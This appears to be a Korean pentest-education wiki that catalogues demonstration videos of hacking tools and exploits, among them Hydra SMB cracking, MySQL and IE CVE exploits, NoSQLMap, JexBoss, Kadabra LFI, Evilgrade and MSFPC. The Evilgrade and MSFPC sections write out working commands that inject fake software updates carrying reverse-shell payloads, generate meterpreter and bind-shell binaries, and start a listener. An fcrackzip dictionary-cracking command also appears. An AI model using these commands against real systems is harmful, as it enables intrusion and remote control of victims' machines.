**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> IoT는 인터넷 혁명의 다음 단계로 간주됩니다. 현실 세계의 점점 더 많은 대상을 가상 세계에 연결하고 언제 어디서나 커뮤니케이션을 가능하게합니다. 광대 한 인기 및 배포로 인해 IoT는 공격자에게 흥미로운 대상이되었습니다. IoT 장치가 무선 채널을 통해 통신하는 것이 점점 더 보편화되고 있으므로 대상 시스템이나 네트워크에 대한 직접적인 물리적 액세스가 더 이상 필요하지 않습니다. 공격 범위는 사용 된 안테나와 송신기의 전력에만 의존합니다.<br>
>
> 오늘날 많은 기업들이 무선 세계에서 목표로 삼고있는 공격에 대해 실질적인 위협으로 생각하기 시작했습니다. 그러나 어떤 장치가 있는지, 어떤 프로토콜이 통신에 사용되고 어떤 정보가 전송되는지는 아무도 모릅니다. 이 거대한 공격 표면은 종종 사이버 보안 전략에있어 막대한 맹점입니다.
>
> 이 강연은 무선 세계의 보안 평가 중에 발생하는 문제, 최첨단 무선 신호 식별 및 알려지지 않은 신호를 밝히기위한 최선의 방법에 대한 통찰력을 제공합니다.
>
> 초점은 일반적인 침투 테스터의 요구에 있으며 문제 식별뿐만 아니라 보안 테스터가 무선 스펙트럼을 쉽게 매핑하고 알 수없는 통신 및 장치를 식별 할 수있는 새로운 도구를 출시하고 데모 할 것입니다.
>
> Youtube 내용 중에 26분 정도쯤을 보시면 취약한 내용을 보여줍니다.

### Description :&#x20;

> "Radio... The final IoT frontier. These are the problems of penetration testers. Our continuing mission: To explore strange new signals... To seek out new devices; new protocols... To boldly detect what no one is aware of!"
>
> The Internet of Things (IoT) is considered to be the next phase of the Internet revolution - linking more and more objects of the real world to the virtual world and enabling anytime, anyplace and anything communication. Due to the vast increase in popularity and distribution, the IoT has become an interesting target for attackers. Because it is becoming more and more common for IoT devices to communicate over wireless channels, direct physical access to the targeted systems or network is no longer necessary. The attack range is then only dependent on the antennas used and the power of their transmitters.
>
> Nowadays many companies are beginning to think about targeted attacks in the wireless world as a real threat but nobody is aware of what devices are out there, which protocols are used for communication and what information is transmitted. This huge attack surface is often a massive blind spot in cyber security strategies.
>
> This talk provides insight into the problems that arise during security assessments in the wireless world, state-of-the-art wireless signal identification and what best practices should be used for revealing unknown signals.
>
> The focus will be on the needs of a typical penetration tester, and in addition to the problem identification, we will release and demo a new tool that enables security testers to easily map the radio spectrum and identify unknown communication and devices.

{% embed url="<https://youtu.be/75xU6PMd00o>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux NetzwerkOrdner cracken mit Hydra

\[Youtube Data] Public Data - \[SMB-Hydra]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux NetzwerkOrdner cracken mit Hydra

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

내용 :&#x20;

> xHydra 프로그램을 이용한 공유폴더(SMB) 해킹 시 영상입니다.

{% embed url="<https://youtu.be/UxbgkZXZx_k>" %}
시연 영상  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# MySQL/MariaDB/Percona - Race Cond CVE-2016-6663 & Root PrivEsc CVE-2016-6664 PoC Exploits

\[Youtube Data] Public Data - \[CVE-2016-6663 & CVE-2016-6664 : Exploits]

{% hint style="info" %}
20**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : MySQL/MariaDB/Percona - Race Cond CVE-2016-6663 & Root PrivEsc CVE-2016-6664 PoC Exploits

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 공격자는 CVE-2016-6663 취약점을 이용하여 웹 사용자 권한 획득 하고 CVE-2016-6664 취약점exploit 을 통해 root 권한을 획득 하는 방법 입니다.
>
> 해당 취약점은 다양한 버전에서 발생 됩니다.
>
> \--- CVE-2016-6663 ---
>
> MariaDB \[5.5.52 , 10.1.18 , 10.0.28]
>
> MySQL \[5.5.51 , 5.6.32 , 5.7.14]
>
> Percona Server \[5.5.51-38.2 , 5.6.32-78-1 , 5.7.14-8]
>
> Percona XtraDB Cluster \[5.6.32-25.17 , 5.7.14-26.17 , 5.5.41-37.0]
>
> \--- CVE-2016-6664 ---
>
> MySQL \[5.5.51 , 5.6.32 , 5.7.14]
>
> MariaDB \[ All current ]
>
> Percona Server \[5.5.51-38.2 , 5.6.32-78-1 , 5.7.14-8]
>
> Percona XtraDB Cluster \[5.6.32-25.17 , 5.7.14-26.17 , 5.5.41-37.0]
>
> 해결방안으로는 최신버전의 보안 업데이트 수행 하시기 바랍니다.

### &#x20;Description :&#x20;

> MySQL / MariaDB / Percona - PoC/Demo Exploit Video for the following vulns:
>
> * Race Condition (CVE-2016-6663 / CVE-2016-5616)
> * Root Privilege Escalation (CVE-2016-6664 / CVE-2016-5617)
>
> In the video, first, exploitation of CVE-2016-6663 Race Condition vuln is shown on 3 different hosts running MySQL, MariaDB and Percona in their default configuration leading to escalation of privileges to mysql system user (mysql shell).
>
> Finally, the exploitation of CVE-2016-6664 is shown on the last target (running Percona database) - leading to escalation to root account (rootshell)

{% embed url="<https://youtu.be/qlegexI63A4>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Microsoft Internet Explorer 8, 9, 10, 11 Exploit | CVE-2016-0189

\[Youtube Data] Public Data - \[Windows Hacking]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Microsoft Internet Explorer 8, 9, 10, 11 Exploit | CVE-2016-0189&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 공격자가 피싱이나 E-Mail, 피싱 등을 통해 url 클릭을 유도 하여 악성 코드나 임의의 코드를 실행 할 수 있는 공격 방법입니다.
>
> github 에 소스코드가 올라가 있으나 테스트 용으로 사용하시기 바랍니다. 그리고 아래의 영상과 github 의 파일 내용은 다르니 참고하시기 바랍니다.
>
> 해당 취약점은 윈도우 익스플로러의 8, 9, 10 and 11 버전에서 발생 됩니다.
>
> 해결방안으로는 최신버전의 보안 업데이트 수행 하시기 바랍니다.

### Description :&#x20;

> Microsoft Internet Explorer 8, 9, 10 and 11 Exploit | CVE-2016-0189\
> \
> Description: The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 8 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0187.

### Infomation :&#x20;

> CVE-2016-0189: <https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>
>
> Source Code : [https://github.com/theori-io/cve-2016-0189﻿](https://github.com/theori-io/cve-2016-0189)

{% embed url="<https://youtu.be/yeky_pW6yb0>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# MS16-007 CVE-2016-0019 Windows RDP Security Bypass

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : MS16-007 CVE-2016-0019 Windows RDP Security Bypass

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing**
{% endhint %}

### 내용 : &#x20;

> MS16-007 의 패치 내용으로 공격자가 대상 시스템에서 암호가 설정되지 않은 계정에 대한 원격 로그온을 방지하지 보안 기능을 우회하는  해킹 시 영상입니다.&#x20;

{% embed url="<https://youtu.be/86_Qh_X5l5k>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# How to Recover Passwords on ZIP Files - fcrackzip

\[Youtube Data] Public Data - \[fcrackzip]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : How to Recover Passwords on ZIP Files - fcrackzip

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> fcrackzip 프로그램을 이용한 zip 파일 걸린 암호를 크래킹(사전대입방식) 하는 시 영상입니다.&#x20;

### Description :&#x20;

> Using fcrackzip to crack a zip file password on Kali Linux (for educational purposes only!)
>
> Example command used in the video: fcrackzip -D -p /home/kali/Documents/rockyou.txt -uv pass\_crack\_example.zip
>
> Command options explained: rockyou.txt is a well-known wordlist that can be downloaded with a quick google search. \[-D|--dictionary] - use a dictionary \[-p|--init-password string] - use string as initial password/file \[-u|--use-unzip] - use unzip to weed out wrong passwords \[-v|--verbose] - be more verbose
>
> Note: you can check "fcrackzip -help" (no quotes) for additional options.

{% embed url="<https://youtu.be/1rR2b7vwRaU>" %}
시연 영상 &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# NoSQLMap MongoDB Management Attack Demo

\[Youtube Data] Public Data - \[NoSQLMAP Attack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : NoSQLMap MongoDB Management Attack Demo

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> MongoDB Open(27017) Port 취약점을 이용한 해킹하는 시 영상입니다.&#x20;

### Infomation :&#x20;

> GitHub : <https://github.com/codingo/NoSQLMap>

{% embed url="<https://youtu.be/xSFi-jxOBwM>" %}
시연 영상  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Exploiting JBOSS with JexBoss

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Exploiting JBOSS with JexBoss

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> JexBoss는 JBoss Application Server 및 기타 Java 플랫폼, 프레임 워크, 응용 프로그램 등에서 취약점을 테스트하고 악용하기 위한 도구입니다.
>
> JBOSS 를 사용하고 있는 관리자 분들은 테스트를 해 보시기 바랍니다.

### Description :&#x20;

> Simple JBOSS exploiting. See more deserialization exploitations in:

### Infomation : &#x20;

> GitHub : <https://github.com/joaomatosf/jexboss>

{% embed url="<https://youtu.be/yI54sRqFOyI>" %}
영상 시연    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux Tools - ATSCAN (Advanced Search & Dork Mass Exploit)

\[Youtube Data] Public Data - \[Kali Linux - ATSCAN]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux Tools - ATSCAN (Advanced Search & Dork Mass Exploit)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> ATSCAN 툴 에 대한 설치 및 시현 영상입니다. 관리하시는 시스템에 대해 취약점 점검을 진행해 보시기 바랍니다.
>
> Advanced Search / Dork / Mass Exploitation Scanner 다양한 기능을 가진 툴 입니다.

### Description :&#x20;

> ● Engines: \[Google apis cache] Bing Ask Yandex Sogou Exalead Shodan ● Mass Dork Search ● Multiple instant scans. ● Mass Exploitation ● Use proxy. ● Random user agent. ● Random engine. ● Mass Extern commands execution. ● Exploits and issues search. ● XSS / SQLI / LFI / AFD scanner. ● Filter wordpress & Joomla sites. ● Wordpress theme and plugin detection. ● Find Admin page. ● Decode / Encode Base64 / MD5 ● Ports scan. ● Collect IPs ● Collect E-mails. ● Auto detect errors. ● Auto detect forms. ● Auto detect Cms. ● Post data. ● Auto sequence repeater. ● Validation. ● Post and Get method ● IP Localisation ● Issues and Exploit search ● Interactive and Normal interface. ● And more...

### Infomation :&#x20;

> GitHub : <https://github.com/AlisamTechnology/ATSCAN>

{% embed url="<https://youtu.be/HTFxU4vBSlU>" %}
&#x20;시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# KADABRA: Automatic LFI Exploiter (all LFI attacks implemented)

\[Youtube Data] Public Data - \[KADAVRA - Automatic LFE Exploit]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : KADABRA: Automatic LFI Exploiter (all LFI attacks implemented)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> KADABRA 툴 에 대한 설치 및 시현 영상입니다.
>
> 설치 방법 : 해당 폴더에 들어가셔서 bash make.bash 를 실행 하시면 설치가 완료 됩니다.

### Description :&#x20;

> **Kadabra contains errors and it is deprecated (some of its functionalities do not work properly). Go here ->** [**https://github.com/D35m0nd142/LFISuite**](https://github.com/D35m0nd142/LFISuite) **to see the new LFI-dedicated software, called LFISuite, I developed, totally written in Python 2.7, much better working than Kadabra and with many more attack modalities. LFISuite provides an attack modality called "Auto-HACK" (in this case it is TOTALLY automatic) by which it scans and find LFI vulnerabilities, then exploits them using the best attack modes without you having to choose or do anything.**

### Infomation : &#x20;

> GitHub : <https://github.com/D35m0nd142/Kadabra>

{% embed url="<https://www.youtube.com/watch?v=iE1ILC86fYk>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Hacking with Evilgrade

\[Youtube Data] Public Data - \[Evilgrade]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Hacking with Evilgrade&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :   &#x20;

> Evilgrade 툴 에 대한 시현 영상입니다. DNS 트래픽 조작 툴 입니다.

### Description :&#x20;

> Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.

Infomation :&#x20;

> #### Commands
>
> **configure / conf - Configure**
>
> **Example #1**
>
> ```
> evilgrade>configure sunjava
> evilgrade(sunjava)>
>
> evilgrade>conf sunjava
> evilgrade(sunjava)>
>
> ## 'conf' takes us back to the global configuration
> evilgrade(sunjava)>conf
> evilgrade>
>
>
> ##
> reload    - Reload to get all modules update (to refresh loaded modules, useful on development)
> start     - Start webserver
> stop      - Stop webserver (fake update server)
> ```
>
> **Example #2**
>
> ```
> evilgrade>start
> evilgrade>
> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
> evilgrade>
> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
>
>
> #######################################
>
>
>
> Example:
> -------
> evilgrade>stop
> Stopping WEBSERVER  [OK]
> Stopping DNSSERVER  [OK]
>
> #######################################
>
> restart   - Restart services (WebServer and DNS Server)
> stops and starts again
>
> #######################################
>
> status    - Get webserver and victims status
>
> Example:
> -------
> evilgrade>show status
> Webserver (pid 4134) already running
>
> Users status:
> ============
>
> .---------------------------------------------------------------------------------------------------------------.
> | Client         | Module           | Status | Md5,Cmd,File                                                     |
> +----------------+------------------+--------+------------------------------------------------------------------+
> | 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
> '----------------+------------------+--------+------------------------------------------------------------------'
>
> #######################################
>
> show      - Display information of <object>.
>
> #######################################
>
> show active    - Display active modules in the webserver
>
> #######################################
>
> show modules    - Display implemented modules
>
> #########################################
>
> show options    - Display modules/global options
>
> Example:
> -------
>
> evilgrade>show options
>
> Display options:
> ===============
>
> .-----------------------------------------------------------------------------------.
> | Name        | Default   | Description                                             |
> +-------------+-----------+---------------------------------------------------------+
> | DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
> | DNSPort     |        53 | Listen Name Server port                                 |
> | debug       |         1 | Debug mode                                              |
> | port        |        80 | Webserver listening port                                |
> | sslport     |       443 | Webserver SSL listening port                            |
> '-------------+-----------+---------------------------------------------------------'
>
> evilgrade>
> evilgrade(notepadplus)>conf vmware
> evilgrade(vmware)>show options (without started services)
>
> Display options:
> ===============
>
> Name = VMware Server
> Version = 1.0
> Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
> Description = ""
> VirtualHost = "www.vmware.com"
>
> .----------------------------------------------.
> | Name   | Default           | Description     |
> +--------+-------------------+-----------------+
> | enable |                 1 | Status          |
> | agent  | ./agent/agent.exe | Agent to inject |
> '--------+-------------------+-----------------'
>
> evilgrade(vmware)>show options (with started services after setting agent)
>
> Display options:
> ===============
>
> Name = VMware Server
> Version = 1.0
> Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
> Description = ""
> VirtualHost = "www.vmware.com"
>
> .--------------------------------------------------------------------------------------------------.
> | Name        | Default                                                          | Description     |
> +-------------+------------------------------------------------------------------+-----------------+
> | enable      |                                                                1 | Status          |
> | agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |
> | agentsize   |                                                            54576 |                 |
> | agent       | ./agent/agent.exe                                                | Agent to inject |
> | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |
> '-------------+------------------------------------------------------------------+-----------------'
>
>
> #########################################
>
> set       - Configure variables global or modules
>
> Example:
> -------
>
> evilgrade>show options
>
>
> Display options:
> ===============
>
> .-----------------------------------------------------------------------------------.
> | Name        | Default   | Description                                             |
> +-------------+-----------+---------------------------------------------------------+
> | DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
> | DNSPort     |        53 | Listen Name Server port                                 |
> | debug       |         0 | Debug mode                                              |
> | port        |        80 | Webserver listening port                                |
> | sslport     |       443 | Webserver SSL listening port                            |
> '-------------+-----------+---------------------------------------------------------'
>
> ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)
>
> evilgrade>set debug 1 #Enable debug
> set debug, 1
>
> evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening
> set DNSAnswerIp, 192.168.1.4
>
> evilgrade>show options
>
> Display options:
> ===============
>
> .-------------------------------------------------------------------------------------.
> | Name        | Default     | Description                                             |
> +-------------+-------------+---------------------------------------------------------+
> | DNSEnable   |           1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip  )                                  |
> | DNSPort     |          53 | Listen Name Server port                                 |
> | debug       |           1 | Debug mode                                              |
> | port        |          80 | Webserver listening port                                |
> | sslport     |         443 | Webserver SSL listening port                            |
> '-------------+-------------+---------------------------------------------------------'
>
>
> ###############################
>
> exit      - exits the program
>
> #######################################
>
> help      - prints this screen, or help on 'command'
>
> #######################################
> ```
>
> **Advance**
>
> * Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.
>
> **Example #1-1**
>
> ```
> evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
> ```
>
> In this case for every required update binary we generate a fake update binary with the payload "windows/shell\_reverse\_tcp" using a reverse shell to connect at address 192.168.233.2 port 4141. The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated. Evilgrade detects the usage of "dynamic fake update binary feature" due to having a sentence between squared brackets '\[]' Inside that brackets we have a string that is also between brackets "" that is compiled using perl.
>
> For example if we use:
>
> ```
> evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
> ```
>
> then every time we get a binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" generating different agents.
>
> An easy alternative, but not dynamically, could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module.
>
> **Example #1-2**
>
> (Outside evilgrade)
>
> ```
> [team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
> ```
>
> (Inside evilgrade)
>
> ```
> evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
> ```
>
> After our payload was generated, we leave a multi handler listening on the previously assigned LHOST.
>
> (Outside evilgrade)
>
> ```
> [team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
> [*] Started reverse handler on 192.168.100.2:4444
> [*] Starting the payload handler...
> ```

{% embed url="<https://youtu.be/nReKwL93Fnk>" %}
시연  영상  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Msfvenom Payload Creator(MPC) in Kali Linux

\[Youtube Data] Public Data - \[Kali Linux - Msfvenom Payload Creator]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Msfvenom Payload Creator(MPC) in Kali Linux

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> MPC 툴 에 대한 사용 하는 방법인 영상입니다.

### Description&#x20;

> Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
>
> Fully automating msfvenom & Metasploit is the end goal *(well as to be be able to automate MPC itself)*. The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order *(in various formats/patterns)*).
>
> The only necessary input from the user should be defining the payload they want by either the platform (e.g. `windows`), or the file extension they wish the payload to have (e.g. `exe`).
>
> * Can't remember your IP for a interface? Don't sweat it, just use the interface name: `eth0`.
> * Don't know what your external IP is? MPC will discover it: `wan`.
> * Want to generate one of each payload? No issue! Try: `loop`.
> * Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: `batch`(for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!

### Infomatio :&#x20;

> GitHub : <https://github.com/g0tmi1k/msfpc>
>
> \## Install
>
> * Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**.
> * Kali v1.x should work.
> * OSX 10.11+ should work.
> * Weakerth4n 6+ should work.
> * *...nothing else has been tested.*
>
> ```
> $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
> $ chmod 0755 /usr/local/bin/msfpc
> ```
>
> Kali Linux : MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is:
>
> ```
> root@kali:~# apt install -y msfpc
> ```
>
> Example #1&#x20;
>
> ```
> $ bash msfpc.sh windows 192.168.1.10
>  [*] MSFvenom Payload Creator (MSFPC v1.4.4)
>  [i]   IP: 192.168.1.10
>  [i] PORT: 443
>  [i] TYPE: windows (windows/meterpreter/reverse_tcp)
>  [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
>   --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
>   > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
>
>  [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
>
>  [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
>  [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
>  [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
>  [*] Done!
> $
> ```
>
> Example #2
>
> ```
> $ ./msfpc.sh elf bind eth0 4444 verbose
>  [*] MSFvenom Payload Creator (MSFPC v1.4.4)
>  [i]        IP: 192.168.103.142
>  [i]      PORT: 4444
>  [i]      TYPE: linux (linux/x86/shell/bind_tcp)
>  [i]     SHELL: shell
>  [i] DIRECTION: bind
>  [i]     STAGE: staged
>  [i]    METHOD: tcp
>  [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
>   --platform linux -a x86 -e generic/none  LPORT=4444 \
>   > '/root/linux-shell-staged-bind-tcp-4444.elf'
>
>  [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'
>
>  [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
>  [i] Size: 4.0K
>  [i]  MD5: eed4623b765eea623f2e0206b63aad61
>  [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185
>
>  [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
>  [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
